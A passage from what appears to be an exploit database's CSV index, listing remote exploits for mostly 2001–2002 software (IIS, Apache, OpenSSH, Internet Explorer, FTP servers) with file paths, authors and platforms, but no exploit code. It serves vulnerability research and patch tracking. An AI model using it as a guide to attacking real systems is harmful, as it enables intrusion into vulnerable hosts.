Delirium",remote,aix, +21095,exploits/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd - Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",remote,linux, +21097,exploits/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 LPD - Remote Command Execution",2001-08-31,ron1n,remote,solaris, +21100,exploits/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Detection Evasion",2001-09-05,blackangels,remote,multiple, +21102,exploits/cgi/remote/21102.txt,"Power Up HTML 0.8033 Beta - Directory Traversal Arbitrary File Disclosure",2001-09-07,"Steve Shepherd",remote,cgi, +21104,exploits/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",remote,cgi, +21109,exploits/windows/remote/21109.c,"EFTP 2.0.7 337 - Remote Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,remote,windows, +21110,exploits/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory Existence / File Existence",2001-09-12,byterage,remote,windows, +21112,exploits/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote Username Enumeration",2001-09-12,"Gabriel A Maggiotti",remote,linux, +21113,exploits/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",remote,windows, +21115,exploits/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",remote,multiple, +21116,exploits/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",remote,multiple, +21118,exploits/windows/remote/21118.txt,"Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055)",2001-10-10,"kikkert security",remote,windows, +21121,exploits/windows/remote/21121.pl,"Oracle9iAS Web Cache 2.0 - Remote Buffer Overflow",2001-10-18,andreas,remote,windows, +21125,exploits/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 - Command Execution",2001-10-19,root@xpteam.f2s.com,remote,cgi, +21127,exploits/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 - JavaScript Interface Spoofing",2001-10-21,"Georgi Guninski",remote,windows, +21128,exploits/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,remote,unix, +21129,exploits/cgi/remote/21129.java,"iBill Management Script - Weak Hard-Coded Password",2001-10-25,"MK Ultra",remote,cgi, +21136,exploits/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass (Metasploit)",2012-08-30,Metasploit,remote,linux, +21137,exploits/multiple/remote/21137.rb,"HP SiteScope (Linux/Windows) - Remote Code Execution (Metasploit)",2012-09-08,Metasploit,remote,multiple, +21138,exploits/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,remote,php, +21142,exploits/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Remote Buffer Overflow",2001-11-05,andreas,remote,windows, +21144,exploits/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",remote,windows, +21145,exploits/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x - Source Code Disclosure",2001-11-08,"Felix Huber",remote,multiple, +21151,exploits/linux/remote/21151.txt,"Horde IMP 2.2.x - Session Hijacking",2001-11-09,"Joao Pedro Goncalves",remote,linux, +21152,exploits/linux/remote/21152.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (1)",2001-11-15,Indigo,remote,linux, +21153,exploits/windows/remote/21153.c,"ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (2)",2001-11-15,Indigo,remote,windows, +21154,exploits/multiple/remote/21154.pl,"ActivePerl 5.6.1 - 'perlIIS.dll' Remote Buffer Overflow (3)",2001-11-15,Sapient2003,remote,multiple, +21155,exploits/php/remote/21155.txt,"PHP-Nuke Network Tool 0.2 Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",remote,php, +21156,exploits/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",remote,windows, +21160,exploits/multiple/remote/21160.txt,"ibm informix Web Datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",remote,multiple, +21161,exploits/unix/remote/21161.txt,"WU-FTPD 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",remote,unix, +21164,exploits/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 - Spoofable File Extensions",2001-11-26,StatiC,remote,windows, +21169,exploits/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x - Outbound Packet Bypass",2001-12-06,"Tom Liston",remote,windows, +21178,exploits/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 - Unauthorized Mail Server Use",2001-12-11,http-equiv,remote,windows, +21179,exploits/solaris/remote/21179.pl,"Solaris 2.x/7.0/8 - Derived 'login' Remote Buffer Overflow",2003-01-09,snooq,remote,solaris, +21182,exploits/novell/remote/21182.txt,"Novell Groupwise 5.5/6.0 Servlet Gateway - Default Authentication",2001-12-15,"Adam Gray",remote,novell, +21183,exploits/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal",2001-12-17,"A. Ramos",remote,cgi, +21185,exploits/unix/remote/21185.sh,"QPopper 4.0.x - PopAuth Trace File Shell Command Execution",2001-12-18,IhaQueR,remote,unix, +21186,exploits/hardware/remote/21186.txt,"ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",remote,hardware, +21188,exploits/windows/remote/21188.c,"Microsoft Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (1)",2001-12-20,"Gabriel Maggiotti",remote,windows, +21189,exploits/windows/remote/21189.c,"Microsoft Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (2)",2001-12-20,JOCANOR,remote,windows, +21190,exploits/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution (Metasploit)",2012-09-10,Metasploit,remote,linux, +21191,exploits/linux/remote/21191.rb,"OpenFiler 2.x - NetworkCard Command Execution (Metasploit)",2012-09-10,Metasploit,remote,linux, +21192,exploits/linux/remote/21192.c,"STunnel 3.x - Client Negotiation Protocol Format String",2001-12-22,deltha,remote,linux, +21193,exploits/multiple/remote/21193.txt,"DeleGate 7.7.1 - Cross-Site Scripting",2001-12-28,"SNS Research",remote,multiple, +21194,exploits/cgi/remote/21194.txt,"Abe Timmerman - 'zml.cgi' File Disclosure",2001-12-31,blackshell,remote,cgi, +21195,exploits/windows/remote/21195.txt,"Microsoft Internet Explorer 5/6 - GetObject File Disclosure",2002-01-01,"Georgi Guninski",remote,windows, +21196,exploits/windows/remote/21196.txt,"AOL Instant Messenger 4.x - Remote Buffer Overflow",2002-01-02,"Matt Conover",remote,windows, +21197,exploits/multiple/remote/21197.txt,"BSCW 3.4/4.0 - Insecure Default Installation",2002-01-03,"Thomas Seliger",remote,multiple, +21198,exploits/windows/remote/21198.html,"Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (1)",2002-01-03,"Tom Micklovitch",remote,windows, +21199,exploits/windows/remote/21199.txt,"Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (2)",2002-01-03,"Liu Die",remote,windows, +21200,exploits/linux/remote/21200.c,"Net-SNMP 4.2.3 - snmpnetstat Remote Heap Overflow",2002-01-03,"Juan M. de la Torre",remote,linux, +21201,exploits/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Remote Buffer Overflow",2002-01-04,Kanatoko,remote,windows, +21203,exploits/windows/remote/21203.txt,"Lucent 8.x - VitalNet Password Authentication Bypass",2002-01-16,"Mark Cooper",remote,windows, +21204,exploits/windows/remote/21204.txt,"Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure",2002-01-04,"Paul Brereton",remote,windows, +21205,exploits/linux/remote/21205.c,"Boozt 0.9.8 - Remote Buffer Overflow",2002-01-07,"Rafael San Miguel Carrasco",remote,linux, +21207,exploits/windows/remote/21207.c,"RealPlayer 7.0/8.0 - Media File Buffer Overflow",2002-01-05,UNYUN,remote,windows, +21210,exploits/linux/remote/21210.txt,"X-Chat 1.x - CTCP Ping Remote IRC Command Execution",2002-01-09,"Marcus Meissner",remote,linux, +21211,exploits/windows/remote/21211.txt,"EServ 2.9x - Password-Protected File Access",2002-01-10,"Tamer Sahin",remote,windows, +21212,exploits/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",remote,multiple, +21214,exploits/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,remote,windows, +21215,exploits/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR MetaCharacter Command Execution",2002-01-11,UNYUN,remote,unix, +21225,exploits/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Remote Buffer Overflow",2002-01-14,aT4r,remote,windows, +21235,exploits/windows/remote/21235.pl,"Citrix Nfuse 1.6 - Published Applications Information Leak",2002-01-22,"Ian Vitek",remote,windows, +21238,exploits/osx/remote/21238.txt,"Apple Mac OS Internet Explorer 3/4/5 - File Execution",2002-01-22,"Jass Seljamaa",remote,osx, +21242,exploits/linux/remote/21242.c,"rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution",2002-01-25,sorbo,remote,linux, +21243,exploits/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",remote,hardware, +21249,exploits/cgi/remote/21249.txt,"Agora.CGI 3/4 - Debug Mode Full Path Disclosure",2002-01-28,superpetz,remote,cgi, +21260,exploits/windows/remote/21260.txt,"Microsoft Site Server 3.0 - Cross-Site Scripting",2002-01-29,"rain forest puppy",remote,windows, +21263,exploits/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting",2002-02-04,superpetz,remote,cgi, +21264,exploits/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)",2002-02-03,"Dave Wilson",remote,php, +21265,exploits/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)",2002-02-03,anonymous,remote,php, +21266,exploits/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)",2002-02-03,anonymous,remote,php, +21268,exploits/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities",2012-09-12,"Mattijs van Ommeren",remote,hardware, +21274,exploits/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",remote,windows, +21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,remote,multiple, +21285,exploits/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",remote,hardware, +21286,exploits/windows/remote/21286.c,"Apple QuickTime 5.0 - Content-Type Remote Buffer Overflow",2002-02-08,UNYUN,remote,windows, +21287,exploits/cgi/remote/21287.pl,"EZNE.NET Ezboard 2000 - Remote Buffer Overflow",2002-02-11,"Jin Ho You",remote,cgi, +21289,exploits/linux/remote/21289.c,"Ettercap 0.6.3.1 - Large Packet Buffer Overflow",2002-02-14,"Fermín J. Serna",remote,linux, +21291,exploits/windows/remote/21291.pl,"Phusion WebServer 1.0 - Directory Traversal (1)",2002-02-16,"Alex Hernandez",remote,windows, +21292,exploits/windows/remote/21292.pl,"Phusion WebServer 1.0 - Directory Traversal (2)",2002-02-16,"Alex Hernandez",remote,windows, +21294,exploits/windows/remote/21294.c,"Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow",2002-02-16,"Alex Hernandez",remote,windows, +21295,exploits/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",remote,multiple, +21297,exploits/unix/remote/21297.c,"Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow",2002-02-21,gunzip,remote,unix, +21298,exploits/windows/remote/21298.c,"Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow",2003-07-04,B-r00t,remote,windows, +21303,exploits/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 - Directory Traversal",2002-02-26,"Strumpf Noir Society",remote,windows, +21309,exploits/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,remote,linux, +21310,exploits/linux/remote/21310.txt,"xtell 2.6.1 - User Status Remote Information Disclosure",2002-02-27,spybreak,remote,linux, +21311,exploits/windows/remote/21311.txt,"BPM Studio Pro 4.2 - HTTPd Directory Traversal",2002-02-27,UNTER,remote,windows, +21313,exploits/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure",2002-03-05,"David Litchfield",remote,windows, +21314,exploits/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-by-One",2002-03-07,Morgan,remote,unix, +21334,exploits/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (1)",2002-03-08,"Wouter ter Maat",remote,php, +21335,exploits/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (2)",2002-03-08,"Wouter ter Maat",remote,php, +21339,exploits/multiple/remote/21339.c,"Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",remote,multiple, +21340,exploits/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD - SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,remote,cgi, +21350,exploits/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,remote,windows, +21354,exploits/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",remote,cgi, +21355,exploits/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",remote,jsp, +21361,exploits/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",remote,windows, +21363,exploits/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,remote,unix, +21364,exploits/netbsd_x86/remote/21364.txt,"NetBSD 1.x - 'TalkD' User Validation",2002-04-03,"Tekno pHReak",remote,netbsd_x86, +21365,exploits/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",remote,linux, +21367,exploits/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",remote,windows, +21368,exploits/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",remote,windows, +21369,exploits/windows/remote/21369.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (2)",2002-04-14,hsj,remote,windows, +21370,exploits/windows/remote/21370.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (3)",2002-04-10,NeMeS||y,remote,windows, +21371,exploits/windows/remote/21371.c,"Microsoft IIS 4.0/5.0 - Chunked Encoding Transfer Heap Overflow (4)",2002-04-24,yuange,remote,windows, +21372,exploits/windows/remote/21372.txt,"Microsoft IIS 4.0/5.0 - HTTP Error Page Cross-Site Scripting",2002-04-10,"Thor Larholm",remote,windows, +21376,exploits/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 - History List Script Injection",2002-04-15,"Andreas Sandblad",remote,windows, +21378,exploits/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch - Default SNMP Community",2002-04-15,"Michael Rawls",remote,hardware, +21384,exploits/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 - Authentication Check SQL Injection",2002-04-15,"pokleyzz sakamaniaka",remote,multiple, +21385,exploits/windows/remote/21385.txt,"Microsoft IIS 5.0 - 'CodeBrws.asp' Source Code Disclosure",2002-04-16,"H D Moore",remote,windows, +21386,exploits/windows/remote/21386.html,"AOL Instant Messenger 4.x - Arbitrary File Creation",2002-04-17,"Noah Johnson",remote,windows, +21390,exploits/cgi/remote/21390.txt,"Sambar Server 5.1 - Script Source Disclosure",2002-04-17,pgrundl,remote,cgi, +21402,exploits/linux/remote/21402.txt,"OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token Buffer Overflow",2002-04-19,"Marcell Fodor",remote,linux, +21410,exploits/windows/remote/21410.pl,"Matu FTP 1.74 - Client Buffer Overflow",2002-04-23,Kanatoko,remote,windows, +21412,exploits/unix/remote/21412.txt,"Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure",2002-04-23,"CHINANSL Security Team",remote,unix, +21415,exploits/cgi/remote/21415.txt,"CGIScript.net - csMailto Hidden Form Field Remote Command Execution",2002-04-23,"Steve Gustin",remote,cgi, +21422,exploits/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting",2002-04-25,frog,remote,linux, +21437,exploits/solaris/remote/21437.c,"Solaris 2/7/8/9 cachefsd - Remote Heap Overflow",2002-01-01,"Last Stage of Delirium",remote,solaris, +21438,exploits/windows/remote/21438.txt,"WorldClient 5.0.x - Arbitrary File Deletion",2002-05-07,Obscure,remote,windows, +21439,exploits/windows/remote/21439.txt,"MDaemon WorldClient 5.0.x - Folder Creation Buffer Overflow",2002-05-07,Obscure,remote,windows, +21440,exploits/bsd/remote/21440.c,"ISC DHCPD 2.0/3.0.1 - NSUPDATE Remote Format String",2002-05-08,Andi,remote,bsd, +21441,exploits/hardware/remote/21441.txt,"Cisco ATA-186 - HTTP Device Configuration Disclosure",2002-05-09,"Patrick Michael Kane",remote,hardware, +21442,exploits/linux/remote/21442.c,"WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)",2002-05-10,korty,remote,linux, +21443,exploits/linux/remote/21443.c,"WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)",2002-05-10,"0x3a0x29 crew",remote,linux, +21444,exploits/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",remote,multiple, +21445,exploits/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",remote,multiple, +21446,exploits/windows/remote/21446.txt,"Ecometry SGDynamo 5.32/6.1/7.0 - Cross-Site Scripting",2002-04-17,frog,remote,windows, +21450,exploits/multiple/remote/21450.txt,"id Software Quake II Server 3.20/3.21 - Remote Information Disclosure",2002-05-15,Redix,remote,multiple, +21451,exploits/windows/remote/21451.txt,"Opera 5.12/6.0 - Frame Location Same Origin Policy Circumvention",2002-05-15,"Andreas Sandblad",remote,windows, +21452,exploits/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 - Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",remote,windows, +21453,exploits/multiple/remote/21453.txt,"SonicWALL SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",remote,multiple, +21456,exploits/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",remote,hardware, +21466,exploits/windows/remote/21466.c,"Youngzsoft CMailServer 3.30/4.0 - Remote Buffer Overflow (1)",2002-05-20,anonymous,remote,windows, +21467,exploits/windows/remote/21467.c,"Youngzsoft CMailServer 3.30/4.0 - Remote Buffer Overflow (2)",2002-05-21,Over_G,remote,windows, +21468,exploits/windows/remote/21468.pl,"Matu FTP Server 1.13 - Remote Buffer Overflow",2002-05-22,Kanatoko,remote,windows, +21469,exploits/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 - Full Path Disclosure",2002-05-22,"Matt Moore",remote,windows, +21470,exploits/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure",2002-05-22,"Matt Moore",remote,windows, +21475,exploits/windows/remote/21475.txt,"LocalWEB2000 2.1.0 Standard - File Disclosure",2002-05-24,"Tamer Sahin",remote,windows, +21483,exploits/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",remote,windows, +21484,exploits/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,remote,windows, +21485,exploits/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",remote,windows, +21488,exploits/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,remote,novell, +21490,exploits/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure",2002-05-29,"Richard Brain",remote,multiple, +21491,exploits/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",remote,multiple, +21492,exploits/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",remote,multiple, +21650,exploits/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",remote,windows, +21510,exploits/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Remote Buffer Overflow",2002-07-27,mat@monkey.org,remote,windows, +21511,exploits/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,remote,multiple, +21513,exploits/hardware/remote/21513.c,"Telindus 1100 Series Router - Administration Password Leak",2002-06-05,rubik,remote,hardware, +21515,exploits/windows/remote/21515.txt,"Microsoft Internet Explorer 5/6 - FTP Web View Cross-Site Scripting",2002-06-06,"Eiji James Yoshida",remote,windows, +21520,exploits/linux/remote/21520.py,"QNX 6.5.0 / QCONN 1.4.207944 - Remote Command Execution",2012-09-25,Mor!p3r,remote,linux, +21530,exploits/windows/remote/21530.txt,"Seanox DevWex Windows Binary 1.2002.520 - File Disclosure",2002-06-08,"Kistler Ueli",remote,windows, +21541,exploits/windows/remote/21541.txt,"Microsoft SQL Server 2000 - SQLXML Script Injection",2002-06-12,"Matt Moore",remote,windows, +21542,exploits/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 - Web Server Buffer Overflow",2002-06-13,"Auriemma Luigi",remote,windows, +21548,exploits/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,remote,cfm, +40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple, +21554,exploits/windows/remote/21554.txt,"Imatix Xitami 2.5 - GSL Template Cross-Site Scripting",2002-06-14,"Matthew Murphy",remote,windows, +21555,exploits/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",remote,windows, +21559,exploits/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",remote,multiple, +21560,exploits/multiple/remote/21560.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",remote,multiple, +21571,exploits/irix/remote/21571.c,"SGI IRIX 6.x - rpc.xfsmd Remote Command Execution",2002-06-20,"Last Stage of Delirium",remote,irix, +21574,exploits/unix/remote/21574.txt,"Pirch IRC 98 Client - Malformed Link Buffer Overrun",2002-06-21,"David Rude II",remote,unix, +21576,exploits/windows/remote/21576.txt,"Working Resources BadBlue 1.7 - 'ext.dll' Cross-Site Scripting",2002-06-23,"Matthew Murphy",remote,windows, +21578,exploits/unix/remote/21578.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (1)",2002-06-24,"Christophe Devine",remote,unix, +21579,exploits/unix/remote/21579.txt,"OpenSSH 3.x - Challenge-Response Buffer Overflow (2)",2002-06-24,"Gobbles Security",remote,unix, +21581,exploits/windows/remote/21581.txt,"Summit Computer Networks Lil' HTTP Server 2 - 'URLCount.cgi' HTML Injection",2002-06-27,"Matthew Murphy",remote,windows, +21582,exploits/windows/remote/21582.txt,"Macromedia JRun 3/4 - Administrative Authentication Bypass",2002-06-28,"Matt Moore",remote,windows, +21586,exploits/linux/remote/21586.txt,"E-Guest 1.1 - Server Side Include Arbitrary Command Execution",2002-06-30,DownBload,remote,linux, +21589,exploits/windows/remote/21589.pl,"AnalogX Proxy 4.0 - Socks4A Buffer Overflow",2002-07-01,Kanatoko,remote,windows, +21591,exploits/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server - Directory Traversal",2002-07-06,"team n.finity",remote,windows, +21595,exploits/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow",2002-07-03,anonymous,remote,windows, +21596,exploits/osx/remote/21596.txt,"Apple Mac OSX 10.1.x - SoftwareUpdate Arbitrary Package Installation",2002-07-08,"Russell Harding",remote,osx, +21597,exploits/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure",2002-07-08,Securiteinfo.com,remote,windows, +21599,exploits/windows/remote/21599.txt,"Working Resources BadBlue 1.7.3 - 'cleanSearchString()' Cross-Site Scripting",2002-07-08,"Matthew Murphy",remote,windows, +21601,exploits/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow",2002-07-08,"Matthew Murphy",remote,windows, +21602,exploits/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal Information Disclosure",2002-07-09,glaive,remote,linux, +21603,exploits/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure",2002-07-09,"Qualys Corporation",remote,multiple, +21604,exploits/linux/remote/21604.txt,"Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting",2002-07-10,"Matt Moore",remote,linux, +21605,exploits/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - Denial of Service 'Device Name' / Cross-Site Scripting",2002-07-10,"Matt Moore",remote,windows, +21606,exploits/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 - OBJECT Tag Same Origin Policy Violation",2002-07-10,"Thor Larholm",remote,windows, +21607,exploits/windows/remote/21607.txt,"GoAhead Web Server 2.1.x - URL Encoded Slash Directory Traversal",2002-07-10,"Matt Moore",remote,windows, +21608,exploits/windows/remote/21608.txt,"GoAhead Web Server 2.1.x - Error Page Cross-Site Scripting",2002-07-10,"Matt Moore",remote,windows, +21611,exploits/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 - 'pbcgi.cgi' Cross-Site Scripting",2002-07-11,"Matthew Murphy",remote,windows, +21613,exploits/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)",2002-07-12,JWC,remote,windows, +21614,exploits/freebsd/remote/21614.c,"ATPhttpd 0.4b - Remote Buffer Overflow",2002-07-12,badc0ded,remote,freebsd, +21615,exploits/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold - Skinfile Buffer Overflow",2002-07-12,UNYUN,remote,windows, +21616,exploits/windows/remote/21616.txt,"Working Resources 1.7.3 BadBlue - Null Byte File Disclosure",2002-06-13,"Matthew Murphy",remote,windows, +21618,exploits/windows/remote/21618.txt,"Mirabilis ICQ 2002 - Sound Scheme Remote Configuration Modification",2002-07-15,xLaNT,remote,windows, +21619,exploits/windows/remote/21619.txt,"AOL Instant Messenger 4.x - Unauthorized Actions",2002-07-16,orb,remote,windows, +21625,exploits/windows/remote/21625.pl,"Trend Micro Interscan VirusWall for Windows NT 3.52 - Space Gap Scan Bypass",2002-07-18,SecuriTeam,remote,windows, +21626,exploits/windows/remote/21626.c,"3.3/4.0/4.2 MERCUR MailServer - Control-Service Buffer Overflow",2002-07-16,anonymous,remote,windows, +22072,exploits/linux/remote/22072.c,"Cobalt RaQ4 - Administrative Interface Command Execution",2002-12-05,grazer,remote,linux, +21627,exploits/multiple/remote/21627.txt,"Oracle Reports Server 6.0.8/9.0.2 - Information Disclosure",2002-07-18,skp,remote,multiple, +21630,exploits/windows/remote/21630.html,"Working Resources 1.7.x BadBlue - Administrative Interface Arbitrary File Access",2002-07-20,"Matthew Murphy",remote,windows, +21631,exploits/windows/remote/21631.txt,"Microsoft Outlook Express 5/6 - Spoofable File Extensions",2002-07-20,"Matthew Murphy",remote,windows, +21633,exploits/windows/remote/21633.c,"SmartMax MailMax 4.8 - Popmax Buffer Overflow",2002-07-20,anonymous,remote,windows, +21635,exploits/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (2)",2002-07-23,"andrea lisci",remote,windows, +21636,exploits/windows/remote/21636.txt,"Opera 6.0.1 / Microsoft Internet Explorer 5/6 - 